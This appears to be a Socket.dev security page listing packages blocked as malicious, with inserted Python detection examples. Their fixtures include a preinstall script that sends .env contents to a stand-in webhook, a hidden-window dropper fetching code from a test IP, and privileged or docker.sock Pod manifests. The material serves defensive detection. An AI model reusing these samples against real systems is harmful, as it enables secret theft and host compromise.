
Company News
Socket Has Acquired Secure Annex
Socket has acquired Secure Annex to expand extension security across browsers, IDEs, and AI tools.
Quickly evaluate the security and health of any open source package.
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This module performs host-wide SUID/SGID enumeration and then generates weaponized, tool-specific privilege-escalation command templates, including a persistence-oriented `systemctl` unit-writing + reverse-shell style payload pattern. It also executes an unsafe-mode `find /` command over the entire filesystem and returns sensitive discovery evidence (paths/owners/permissions). Undefined variables in the exploit path may cause it to fail at runtime, but the core behavior shown is a high-abuse “priv-esc recipe generator,” indicating malicious or at least intentionally offensive capability.
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This code strongly indicates malicious/credential-theft functionality: it executes impacket secretsdump.py for DCSync (including krbtgt/Administrator/AzureAD SSO target selection), checks AD replication rights via ldapsearch, parses secretsdump output into extracted credentials, and includes actionable command templates for DCShadow and NTDS.dit extraction. It also uses allow_unsafe_shell=True with command strings built from external inputs and embeds passwords/NTLM hashes into command lines. If this is part of a dependency, it should be treated as highly suspicious and reviewed/blocked immediately.
@neoxr/wb
6.0.0-rc.44
by neoxr
Live on npm
Blocked by Socket
High-confidence identification of an obfuscated packer/loader. It uses anti-analysis string-table rotation plus dynamic Function(...) execution and injects browser/Node globals (window/require/module/exports) into the execution context. While the provided fragment does not show concrete exfiltration or persistence primitives directly, the loader pattern is commonly used to hide malicious behavior; the decoded payload must be inspected in a sandbox to confirm intent.
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This module performs authenticated reconnaissance of Kubernetes mutating admission webhook configurations using in-cluster service account credentials and, upon detecting certain webhook configuration characteristics, returns weaponized exploitation guidance (DoS, selector evasion concepts, timing/race ideas, cyclic mutation/stack overflow ideas, and privileged pod/hostPath escalation). Even though the snippet itself does not directly modify cluster state, the inclusion of explicit attacker next-steps and the recon-to-exploitation framing make the behavior strongly suspicious and high risk for malicious use or internal abuse.
openhosta
4.3.0
Live on pypi
Blocked by Socket
This dependency implements dynamic evaluation of attacker-influenced Python source via `exec(cleaned_code, local_scope)` after only a syntax check (`ast.parse`). There is no sandboxing or restriction on capabilities, and the execution context uses a potentially shared class-level scope that could allow cross-call state mutation. Code-fence/escape normalization increases the likelihood that adversarially formatted payloads will be transformed into executable code. While no explicit network/file exfiltration is shown in this snippet, the capability to run arbitrary code makes it a high security-risk component and a strong candidate for supply-chain/runtime compromise if the input trust boundary is not strictly enforced.
@saputzx/baileys
1.0.0
by saputzx
Live on npm
Blocked by Socket
This fragment strongly matches a malicious/compromised dependency loader pattern: it is heavily obfuscated, performs runtime string decoding that drives dynamic execution via multiple new Function(...) sinks (eval-equivalent), probes execution environment globals, and orchestrates asynchronous outbound/API-style requests through imported utilities while extracting and repackaging rich remote metadata. The exact external endpoints/destinations are not explicitly visible in the excerpt, but the behavior profile is high risk and consistent with covert data retrieval/automation rather than legitimate library functionality.
frank-newton3-db-poc
1.0.5
by cketol
Live on npm
Blocked by Socket
This preinstall script is malicious: it collects sensitive local files, searches for databases and environment context, and posts that data to an external webhook. Installing this package would leak potentially sensitive information from the host to a third party. Treat as active data-exfiltration malware and do not install.
rhua-chatgpt-web
1.1.51
by hguang
Live on npm
Blocked by Socket
The bundle’s dominant security-relevant anomaly is an application-specific plugin executor that dynamically compiles and executes JavaScript from persisted plugin definitions (plugin_list) using new Function over plugin.func.body. This constitutes a high-risk arbitrary code execution capability that can be leveraged for supply-chain sabotage and potential data exfiltration, especially since the same runtime holds API credentials used in Authorization headers. The rest of the code appears consistent with an API SDK (stream parsing, request helpers, and prompt/tool utilities) without overt malicious payloads.
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This module is highly suspicious and exploit-oriented: it uses an in-cluster service account token to actively create/delete Pods via the Kubernetes API, and it includes a crafted path traversal payload in serviceAccountToken.path aimed at a sensitive host location (systemd service path). The success criteria are based on API rejection text rather than definitive impact, but the explicit malicious payload and control-plane mutation strongly indicate an exploitation/probing component. Additionally, the snippet contains apparent syntax/logic defects (incomplete `demo_next =` and malformed exception return) that may prevent the final 'exploited' reporting path from executing, but they do not reduce the malicious intent evidenced earlier in the flow.
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This module is highly suspicious and likely malicious or offensive-purpose: it uses an in-cluster Kubernetes service account token to authenticate to the Kubernetes API and performs a state-changing operation by attempting to create a privileged pod (securityContext.privileged=True). If successful (or if permissive policy indicators are detected), it labels the environment as 'exploited' and includes a detailed, attacker-style exploitation chain for host and credential/token compromise. Even though the narrative is not executed as code, the overall behavior matches real privilege-escalation probing and would be dangerous in any environment where it is run with sufficient RBAC permissions.
esoftplay
0.0.268-betac8d7f9e
by danang
Live on npm
Blocked by Socket
This module is high-risk for supply-chain compromise. The most critical issues are (1) eval(cjson.config.post_script), which enables arbitrary code execution from config content, (2) automated expect-based EAS login using usr/pwd extracted from configuration, and (3) hardcoded Telegram Bot credentials used to send outbound messages via curl. In addition, it performs destructive rm -rf of node_modules/lockfiles followed by dependency installation, amplifying impact if any upstream config/path inputs are manipulated. Treat as untrusted until the full module and all config sources are verified and the eval/credential/exfil capabilities are removed or strictly controlled.
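The preinstall collector (frank-newton3-db-poc), the persisted-plugin `new Function` executor (rhua-chatgpt-web) and the eval/curl/Telegram script (esoftplay) above share a small set of source-level signals. The Python script below, an added example rather than Socket's scanner or any listed package's code, audits an unpacked npm package for them: install-time lifecycle hooks in package.json, reads of local secret files, hardcoded webhook or bot endpoints, and strings evaluated as code. The rule set, the verdict policy, the `hooks.example.test` endpoint and the sample package it writes to a temp directory are all this example's own construction.

```python
"""Audit an unpacked npm package for install-time exfiltration signals.
Added example; not Socket's scanner and not code from any package on this
page. Rules, policy and the sample package are this example's own construction."""
import json
import os
import re
import tempfile

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
SINKS = {
    # strings turned into code at runtime (eval-equivalents)
    "dynamic-code": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\(|\bFunction\s*\("),
    # local secret files; the lookbehind keeps process.env from matching .env
    "secret-path": re.compile(r"(?<!\w)\.(?:env|npmrc|ssh|aws/credentials|git-credentials)\b|id_rsa"),
    # hardcoded content-carrying endpoints (generic webhook paths, chat bots)
    "webhook-url": re.compile(r"""https?://[^\s'"`]*(?:webhook|hooks\.slack\.com|discord\.com/api/webhooks|api\.telegram\.org/bot)[^\s'"`]*""", re.I),
    # shelling out from an install script
    "child-process": re.compile(r"""require\(\s*['"]child_process['"]\s*\)|\bexecSync\s*\(|\bspawn\s*\("""),
}
SCANNED_EXT = (".js", ".cjs", ".mjs", ".sh")


def audit_npm_package(pkg_dir: str) -> list:
    """Return findings as dicts {rule, where, detail} for one unpacked package."""
    with open(os.path.join(pkg_dir, "package.json"), encoding="utf-8") as fh:
        manifest = json.load(fh)
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        if hook in scripts:
            findings.append({"rule": "install-hook", "where": "package.json", "detail": f"{hook}: {scripts[hook]}"})
    for root, _dirs, files in os.walk(pkg_dir):
        for name in sorted(files):
            if not name.endswith(SCANNED_EXT):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            for rule, pattern in SINKS.items():
                match = pattern.search(text)  # first hit per rule per file is enough
                if match:
                    findings.append({"rule": rule, "where": os.path.relpath(path, pkg_dir), "detail": match.group(0)})
    return findings


def npm_verdict(findings: list) -> str:
    """Example policy: an install hook beside secret reads and an outbound webhook is
    the exfiltration pattern and is blocked; any single signal earns a review."""
    rules = {f["rule"] for f in findings}
    if {"install-hook", "secret-path", "webhook-url"} <= rules:
        return "block"
    return "review" if rules else "clean"


# Constructed sample package standing in for the preinstall collector described above.
SAMPLE_MANIFEST = {"name": "sample-db-poc", "version": "1.0.0",
                   "scripts": {"preinstall": "node setup.js"}}
SAMPLE_SETUP_JS = r'''
// Constructed stand-in; hooks.example.test is a reserved example domain, not a real endpoint.
const fs = require("fs"), os = require("os"), path = require("path");
const env = fs.existsSync(".env") ? fs.readFileSync(".env", "utf8") : "";
fetch("https://hooks.example.test/webhook/abc123", {
  method: "POST",
  body: JSON.stringify({ host: os.hostname(), user: os.userInfo().username, env }),
});
'''


def build_sample_package(manifest: dict, files: dict) -> str:
    """Write a manifest and source files into a fresh temp dir; return its path."""
    pkg_dir = tempfile.mkdtemp(prefix="npm-audit-")
    with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
        json.dump(manifest, fh)
    for name, text in files.items():
        with open(os.path.join(pkg_dir, name), "w", encoding="utf-8") as fh:
            fh.write(text)
    return pkg_dir


if __name__ == "__main__":
    pkg = build_sample_package(SAMPLE_MANIFEST, {"setup.js": SAMPLE_SETUP_JS})
    found = audit_npm_package(pkg)
    print(npm_verdict(found), [(f["rule"], f["where"], f["detail"]) for f in found])
```

The regexes are deliberately coarse: they are signals, not proof, which is why a lone `dynamic-code` or `install-hook` hit only earns a review. The `secret-path` lookbehind matters in practice, since nearly every Node file touches `process.env` and a naive `.env` rule would flag all of them.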
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This dependency module is high-risk and appears deliberately weaponized: it performs Kubernetes token-based API discovery and hostpath/host filesystem access probing (including write testing) and, upon detection, returns a fully actionable exploitation/persistence and secret-exfiltration playbook in its result fields. Even without executing the payload itself, embedding direct reverse-shell and persistence instructions tied to detected conditions is a strong malicious/sabotage indicator. Treat as malicious or at minimum as an attack-enabling tool requiring immediate containment/review.
meche-dom
0.1.17
by kris.trajanoski
Live on npm
Blocked by Socket
This module warrants immediate security review: it ships inside a dotenv-based package, but its decisive behavior is a runtime decrypt-and-drop routine. It derives an AES-GCM key from environment secrets (LICENSE_KEY/SALT_KEY), decrypts all bundled encrypted/*.enc files, deletes any existing ./output directory, and writes the decrypted plaintext to ./output. Even without visible exfiltration or execution in this fragment, key-gated decryption plus on-disk staging is a classic supply-chain payload-concealment pattern; review the decrypted artifacts and the downstream code that consumes ./output.
@pisell/materials
1.8.32
by jinglin.tan
Live on npm
Blocked by Socket
Suspicious supply-chain risk. The module includes privacy-invasive incognito detection exported globally and—more importantly—hardcodes third-party Feishu webhook endpoints and posts dynamically constructed message content (title/content) via fetch() without visible safeguards. Additional capabilities (clipboard write, runtime network printing calls, and native bridge forwarding) broaden the abuse surface. Even if intended for legitimate telemetry/notifications, the hardcoded content-carrying webhook exfiltration pattern warrants security review and restriction (e.g., allowlisting destinations, auditing call paths, and ensuring no sensitive data is sent).
@neoxr/wb
6.0.0-rc.44
by neoxr
Live on npm
Blocked by Socket
This module is best classified as a high-risk obfuscated runtime loader/packer. It dynamically reconstructs and executes hidden code via `Function(...)` and explicitly injects powerful environment accessors (`window`, `exports`, `require`), enabling broad malicious behavior in both browser and Node contexts. The exact downstream actions are not observable due to truncation/packing, but the structure is highly consistent with malicious supply-chain payload loaders. Treat as unsafe until the reconstructed payload is fully extracted and analyzed in a sandboxed environment.
@shepai/cli
1.194.3-pr586.23e3597
by shep-bot
Live on npm
Blocked by Socket
This module embeds an HTTP POST side effect that spawns the external `gh auth login --web` command in detached mode with ignored stdio and suppressed visibility. That is atypical for standard Next.js route runtime code and creates a high-risk pathway for unauthorized process execution / credential-adjacent behavior if the route is reachable without strong authorization and auditing. Additionally, it can disclose error details by returning `e.message` on spawn failure. Other parts of the fragment appear to be normal Next.js server scaffolding without obvious additional malicious primitives.
timemcp190825790125120985125
0.1.0
Live on pypi
Blocked by Socket
This fragment is a high-confidence malicious loader/dropper: it downloads arbitrary Python code from a hardcoded remote IP over unencrypted HTTP, writes it to the local temp directory as launcher.py, and executes it using pythonw.exe with no visible window. The absence of integrity/authenticity checks and the stealthy execution strongly indicate malware staging behavior rather than legitimate functionality.
boss-career-ops
0.7.0
Live on pypi
Blocked by Socket
This module is strongly indicative of malicious or highly abusive behavior: it implements an unauthenticated WebSocket command bridge that can steal cookies from a targeted site, capture screenshots, navigate and manipulate the user’s active tab, and execute attacker-supplied arbitrary JavaScript via new Function(params.script). It then exfiltrates results and telemetry back to the WebSocket endpoint. Transport is plaintext (ws://) and there are no security controls (validation/authentication/allowlisting), making the design suitable for command-and-control and data theft.
juanbanco-.solidity
0.0.189
by shesjutslikeyouandme
Live on openvsx
Blocked by Socket
This module is not consistent with a normal compiler/utility library. It implements a Windows Script Host dropper/loader: it stages and executes a payload via ActiveX/WScript, uses registry markers to manage persistence/anti-reinfection, verifies execution via stdout/stderr parsing, and includes dynamic code execution and evasion-like gating. Overall assessment: highly malicious behavior; treat the package as unsafe until isolated and fully analyzed in a sandbox.
@costrict/csc
4.0.13-beta.0
by zgsm
Live on npm
Blocked by Socket
This fragment is mostly consistent with sharp’s native module loader and image-processing option validation, but it also includes a macOS-only clipboard image extraction capability implemented via AppleScript (`osascript`). It reads user clipboard PNG data, writes it to `/tmp`, reads it back into memory, deletes the file, and returns the clipboard image bytes to the caller—an inherently privacy-sensitive behavior that can enable clipboard harvesting. No network exfiltration is shown in the provided code, so maliciousness depends on how the returned data is used by the importing application, but the capability itself is a significant security concern.
@atls/code-runtime
2.1.26
by torinasakura
Live on npm
Blocked by Socket
This fragment is a base64-backed file-dropper that writes an attacker-controlled directory tree to a caller-provided destination. The embedded decoded content strongly resembles CI/CD workflow and shell automation that performs secret-based registry authentication and downloads/extracts/installs artifacts—behavior commonly used in supply-chain attacks to achieve persistence and propagation via CI execution. Even though the module itself does not run commands, it substantially increases risk because it stages dangerous automation/config files for later execution.
nkit-framework
0.3.0
Live on pypi
Blocked by Socket
This module provides two direct arbitrary code execution pathways (in-process exec and out-of-process subprocess execution of attacker-written Python code) and further registers attacker-defined functions into a ToolRegistry, creating a persistent execution capability within the running application. It lacks sandboxing, validation, and authorization checks. If any untrusted party can trigger these functions, the security risk is critical. Do not expose these capabilities to untrusted inputs without strong sandboxing and strict controls.
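openhosta, timemcp190825790125120985125 and nkit-framework above are all Python and are blocked for a handful of concrete source constructs: `exec`/`eval` over runtime-built strings, `shell=True` subprocess calls, a download from a hardcoded plaintext-HTTP IP, and a hidden `pythonw.exe` launch. The scanner below, an added example and not Socket's code or any of those packages' code, finds those constructs with the standard `ast` module. The rule names, the `verdict` policy and the three sample modules (with the TEST-NET address 203.0.113.10) are this example's own construction.

```python
"""Static scan of Python source for dynamic-code and dropper patterns.
Added example; not Socket's scanner and not code from any package on this
page. Rule names, policy and sample modules are this example's own construction."""
import ast
import re

# Plaintext HTTP URL whose host is a bare IPv4 address (no DNS, no TLS).
IP_HTTP_URL = re.compile(r"^http://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?(?:/|$)")
SPAWN_FUNCS = {"Popen", "run", "call", "check_call", "check_output"}
CREATE_NO_WINDOW = 0x08000000  # Windows process-creation flag that hides the console


def _callee(node: ast.Call) -> str:
    """Dotted name of the called function, e.g. 'subprocess.Popen' or 'exec'."""
    parts, func = [], node.func
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    return ".".join(reversed(parts))


def scan_python_source(source: str) -> list:
    """Return findings as dicts {rule, line, detail}, sorted by line."""
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        # malformed source in a published package is itself worth a look
        return [{"rule": "unparseable", "line": exc.lineno or 0, "detail": "syntax error; inspect by hand"}]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _callee(node)
            # exec()/eval() on anything but a string literal: code assembled at runtime
            if name in ("exec", "eval") and node.args and not isinstance(node.args[0], ast.Constant):
                findings.append({"rule": "dynamic-exec", "line": node.lineno, "detail": f"{name}() on non-literal source"})
            # subprocess.*(..., shell=True): the command string goes through a shell
            if name.split(".")[-1] in SPAWN_FUNCS:
                for kw in node.keywords:
                    if kw.arg == "shell" and isinstance(kw.value, ast.Constant) and kw.value.value is True:
                        findings.append({"rule": "shell-true", "line": node.lineno, "detail": f"{name}(shell=True)"})
        elif isinstance(node, ast.Constant):
            if isinstance(node.value, str):
                if IP_HTTP_URL.match(node.value):
                    findings.append({"rule": "http-ip-url", "line": node.lineno, "detail": node.value})
                if "pythonw" in node.value.lower():
                    findings.append({"rule": "hidden-interpreter", "line": node.lineno, "detail": node.value})
            elif node.value == CREATE_NO_WINDOW:
                findings.append({"rule": "hidden-window", "line": node.lineno, "detail": "creationflags=0x08000000"})
        elif isinstance(node, ast.Attribute) and node.attr == "CREATE_NO_WINDOW":
            findings.append({"rule": "hidden-window", "line": node.lineno, "detail": "subprocess.CREATE_NO_WINDOW"})
    return sorted(findings, key=lambda f: (f["line"], f["rule"]))


def verdict(findings: list) -> str:
    """Example policy: runtime code execution or a plaintext-IP download is a block;
    anything else found is a review; nothing found is clean."""
    rules = {f["rule"] for f in findings}
    if rules & {"dynamic-exec", "http-ip-url", "unparseable"}:
        return "block" if rules - {"unparseable"} else "review"
    return "review" if rules else "clean"


# Constructed samples (not the real packages' code); 203.0.113.10 is a TEST-NET address.
SAMPLE_DROPPER = '''
import os, subprocess, tempfile, urllib.request
code = urllib.request.urlopen("http://203.0.113.10:8080/launcher.py").read()
path = os.path.join(tempfile.gettempdir(), "launcher.py")
open(path, "wb").write(code)
subprocess.Popen(["pythonw.exe", path], creationflags=0x08000000)
'''
SAMPLE_EXEC = '''
import ast
def run(cleaned_code, local_scope):
    ast.parse(cleaned_code)          # syntax check only; no capability restriction
    exec(cleaned_code, local_scope)
'''
SAMPLE_BENIGN = '''
import json
def load(path):
    with open(path) as fh:
        return json.load(fh)
'''

if __name__ == "__main__":
    for label, src in (("dropper", SAMPLE_DROPPER), ("exec", SAMPLE_EXEC), ("benign", SAMPLE_BENIGN)):
        found = scan_python_source(src)
        print(label, verdict(found), [(f["line"], f["rule"]) for f in found])
```

A file that does not parse, like the mindfabric-agent fragment above with its incomplete `demo_next =`, is reported as `unparseable` rather than skipped; a scanner that silently drops files it cannot parse gives an attacker a free bypass.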
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This code is a container/host escape exploitation tester that performs real attack steps in non-safe mode—most notably using an exposed Docker socket to create a host-mounting container and retrieve /etc/passwd from the host via container logs, and using CAP_SYS_ADMIN to mount-bind '/' and read host passwd. It also probes/reads Kubernetes service account tokens and checks cloud metadata endpoints associated with credential theft. Overall, it represents high-risk offensive behavior consistent with malware/weaponized supply-chain content rather than benign scanning.
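The mindfabric-agent entries above (privileged pod creation, hostPath probing, the serviceAccountToken path traversal, and the Docker-socket and CAP_SYS_ADMIN escapes) all turn on Pod settings that a validating admission policy can refuse before any of it runs. The check below, an added example and not code from that package or from Socket, evaluates a Pod manifest dict for exactly those settings; the rule names, the deny set and the sample manifests are this example's own construction, and nothing here contacts an API server.

```python
"""Offline admission-style check of a Kubernetes Pod manifest for host-escape
primitives. Added example; not code from mindfabric-agent or Socket. Rules,
deny set and sample manifests are this example's own construction."""
import posixpath

SENSITIVE_HOST_PATHS = ("/var/run/docker.sock", "/run/docker.sock", "/run/containerd",
                        "/etc", "/root", "/var/lib/kubelet", "/proc", "/sys")
DANGEROUS_CAPS = {"SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "ALL"}
DENY_RULES = {"privileged", "dangerous-capability", "host-namespace",
              "sensitive-hostpath", "token-path-traversal"}


def _containers(spec: dict) -> list:
    return list(spec.get("containers") or []) + list(spec.get("initContainers") or [])


def audit_pod(manifest: dict) -> list:
    """Return (rule, detail) tuples for every risky setting in the manifest."""
    spec = manifest.get("spec") or {}
    findings = []
    for key in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(key) is True:
            findings.append(("host-namespace", key))
    for container in _containers(spec):
        ctx = container.get("securityContext") or {}
        if ctx.get("privileged") is True:
            findings.append(("privileged", container.get("name", "?")))
        for cap in (ctx.get("capabilities") or {}).get("add") or []:
            if cap.upper().replace("CAP_", "", 1) in DANGEROUS_CAPS:
                findings.append(("dangerous-capability", f"{container.get('name', '?')}:{cap}"))
    for volume in spec.get("volumes") or []:
        host_path = volume.get("hostPath")
        if host_path:
            # normpath collapses "/var/../" and trailing slashes before comparison
            path = posixpath.normpath(host_path.get("path", ""))
            sensitive = path == "/" or path in SENSITIVE_HOST_PATHS or \
                any(path.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)
            findings.append(("sensitive-hostpath" if sensitive else "hostpath", path))
        for source in (volume.get("projected") or {}).get("sources") or []:
            token = source.get("serviceAccountToken")
            if token:
                rel = posixpath.normpath(token.get("path", "token"))
                # kube-apiserver rejects such paths itself; flag the attempt so it is logged
                if rel.startswith("..") or rel.startswith("/"):
                    findings.append(("token-path-traversal", token["path"]))
    return findings


def admission_decision(manifest: dict):
    """('deny' | 'allow', findings), the answer a validating webhook would give."""
    findings = audit_pod(manifest)
    decision = "deny" if any(rule in DENY_RULES for rule, _ in findings) else "allow"
    return decision, findings


def _pod(name: str, **spec) -> dict:
    return {"apiVersion": "v1", "kind": "Pod", "metadata": {"name": name}, "spec": spec}


# Constructed manifests standing in for the probes described above.
PRIVILEGED_POD = _pod("priv", containers=[{"name": "app", "image": "busybox",
                                            "securityContext": {"privileged": True}}])
DOCKER_SOCK_POD = _pod("dock", containers=[{"name": "app", "image": "busybox",
                                             "volumeMounts": [{"name": "sock", "mountPath": "/var/run/docker.sock"}]}],
                       volumes=[{"name": "sock", "hostPath": {"path": "/var/run/docker.sock/"}}])
TOKEN_TRAVERSAL_POD = _pod("tok", containers=[{"name": "app", "image": "busybox"}],
                           volumes=[{"name": "sa", "projected": {"sources": [{"serviceAccountToken": {
                               "path": "../../../../etc/systemd/system/demo.service"}}]}}])
BENIGN_POD = _pod("web", containers=[{"name": "app", "image": "nginx",
                                      "securityContext": {"allowPrivilegeEscalation": False}}],
                  volumes=[{"name": "cache", "emptyDir": {}}])

if __name__ == "__main__":
    for pod in (PRIVILEGED_POD, DOCKER_SOCK_POD, TOKEN_TRAVERSAL_POD, BENIGN_POD):
        print(pod["metadata"]["name"], admission_decision(pod))
```

kube-apiserver validates projected volume paths and rejects `..` components itself, which is why the entry above notes that the package keys its "success" test on the API's rejection text; the check still records the attempt so it shows up in audit logs instead of being dropped silently. In a live cluster the same logic belongs in a ValidatingAdmissionPolicy or the Pod Security Admission `restricted` profile, not in a script; the script only makes the decision inspectable.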
@shepai/cli
1.194.4-pr585.c5c90c7
by shep-bot
Live on npm
Blocked by Socket
This module embeds an HTTP POST side effect that spawns the external `gh auth login --web` command in detached mode with ignored stdio and suppressed visibility. That is atypical for standard Next.js route runtime code and creates a high-risk pathway for unauthorized process execution / credential-adjacent behavior if the route is reachable without strong authorization and auditing. Additionally, it can disclose error details by returning `e.message` on spawn failure. Other parts of the fragment appear to be normal Next.js server scaffolding without obvious additional malicious primitives.
Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.
Possible typosquat attack
Known malware
Git dependency
GitHub dependency
HTTP dependency
Obfuscated code
Suspicious Stars on GitHub
Telemetry
Protestware or potentially unwanted behavior
Unstable ownership
Critical CVE
High CVE
Medium CVE
Low CVE
Unpopular package
Minified code
Bad dependency semver
Wildcard dependency
Socket optimized override available
Deprecated
Unmaintained
Explicitly Unlicensed Item
License Policy Violation
Misc. License Issues
Ambiguous License Classifier
Copyleft License
License exception
No License Found
Non-permissive License
Unidentified License
Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.
Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.

Nat Friedman
CEO at GitHub

Suz Hinton
Senior Software Engineer at Stripe
heck yes this is awesome!!! Congrats team 🎉👏

Matteo Collina
Node.js maintainer, Fastify lead maintainer
So awesome to see @SocketSecurity launch with a fresh approach! Excited to have supported the team from the early days.

DC Posch
Director of Technology at AppFolio, CTO at Dynasty
This is going to be super important, especially for crypto projects where a compromised dependency results in stolen user assets.

Luis Naranjo
Software Engineer at Microsoft
If software supply chain attacks through npm don't scare the shit out of you, you're not paying close enough attention.
@SocketSecurity sounds like an awesome product. I'll be using socket.dev instead of npmjs.org to browse npm packages going forward

Elena Nadolinski
Founder and CEO at Iron Fish
Huge congrats to @SocketSecurity! 🙌
Literally the only product that proactively detects signs of JS compromised packages.

Joe Previte
Engineering Team Lead at Coder
Congrats to @feross and the @SocketSecurity team on their seed funding! 🚀 It's been a big help for us at @CoderHQ and we appreciate what y'all are doing!

Josh Goldberg
Staff Developer at Codecademy
This is such a great idea & looks fantastic, congrats & good luck @feross + team!
The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.

Scott Roberts
CISO at UiPath
As a happy Socket customer, I've been impressed with how quickly they are adding value to the product, this move is a great step!

Yan Zhu
Head of Security at Brave, DEFCON, EFF, W3C
glad to hear some of the smartest people i know are working on (npm, etc.) supply chain security finally :). @SocketSecurity

Andrew Peterson
CEO and Co-Founder at Signal Sciences (acq. Fastly)
How do you track the validity of open source software libraries as they get updated? You're prob not. Check out @SocketSecurity and the updated tooling they launched.
Supply chain is a cluster in security as we all know and the tools from Socket are "duh" type tools to be implementing. Check them out and follow Feross Aboukhadijeh to see more updates coming from them in the future.

Zbyszek Tenerowicz
Senior Security Engineer at ConsenSys
socket.dev is getting more appealing by the hour

Devdatta Akhawe
Head of Security at Figma
The @SocketSecurity team is on fire! Amazing progress and I am excited to see where they go next.

Sebastian Bensusan
Engineering Manager at Stripe
I find it surprising that we don't have _more_ supply chain attacks in software:
Imagine your airplane (the code running) was assembled (deployed) daily, with parts (dependencies) from internet strangers. How long until you get a bad part?
Excited for Socket to prevent this

Adam Baldwin
VP of Security at npm, Red Team at Auth0/Okta
Congrats to everyone at @SocketSecurity ❤️🤘🏻

Nico Waisman
CISO at Lyft
This is an area that I have personally been very focused on. As Nat Friedman said in the 2019 GitHub Universe keynote, Open Source won, and every time you add a new open source project you rely on someone else's code and you rely on the people that build it.
This is both exciting and problematic. You are bringing real risk into your organization, and I'm excited to see progress in the industry from OpenSSF scorecards and package analyzers to the company that Feross Aboukhadijeh is building!
Secure your team's dependencies across your stack with Socket. Stop supply chain attacks before they reach production.
RUST
Rust Package Manager
PHP
PHP Package Manager
GOLANG
Go Dependency Management
JAVA
JAVASCRIPT
Node Package Manager
.NET
.NET Package Manager
PYTHON
Python Package Index
RUBY
Ruby Package Manager
SWIFT
AI
AI Model Hub
CI
CI/CD Workflows
EXTENSIONS
Chrome Browser Extensions
EXTENSIONS
VS Code Extensions
Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.
Nov 23, 2025
Shai Hulud v2
Shai Hulud v2 campaign: preinstall script (setup_bun.js) and loader (setup_bin.js) that installs/locates Bun and executes an obfuscated bundled malicious script (bun_environment.js) with suppressed output.
Nov 05, 2025
Elves on npm
A surge of auto-generated "elf-stats" npm packages is being published from newly created accounts, roughly one every two minutes. The packages contain simple malware variants and are being rapidly removed by npm. At least 420 unique packages have been identified, some of whose descriptions mention a capture-the-flag challenge or a test.
Jul 04, 2025
RubyGems Automation-Tool Infostealer
Since at least March 2023, a threat actor using multiple aliases uploaded 60 malicious gems to RubyGems that masquerade as automation tools (Instagram, TikTok, Twitter, Telegram, WordPress, and Naver). The gems display a Korean Glimmer-DSL-LibUI login window, then exfiltrate the entered username/password and the host's MAC address via HTTP POST to threat actor-controlled infrastructure.
Mar 13, 2025
North Korea's Contagious Interview Campaign
Since late 2024, we have tracked hundreds of malicious npm packages and supporting infrastructure tied to North Korea's Contagious Interview operation, with tens of thousands of downloads targeting developers and tech job seekers. The threat actors run a factory-style playbook: recruiter lures and fake coding tests, polished GitHub templates, and typosquatted or deceptive dependencies that install or import into real projects.
Jul 23, 2024
Network Reconnaissance Campaign
A malicious npm supply chain attack that leveraged 60 packages across three disposable npm accounts to fingerprint developer workstations and CI/CD servers during installation. Each package embedded a compact postinstall script that collected hostnames, internal and external IP addresses, DNS resolvers, usernames, home and working directories, and package metadata, then exfiltrated this data as a JSON blob to a hardcoded Discord webhook.
Research
/Security News
Socket is tracking cloned Open VSX extensions tied to GlassWorm, with several updated from benign-looking sleepers into malware delivery vehicles.

Product
Reachability analysis for PHP is now available in experimental, helping teams identify which vulnerabilities are actually exploitable.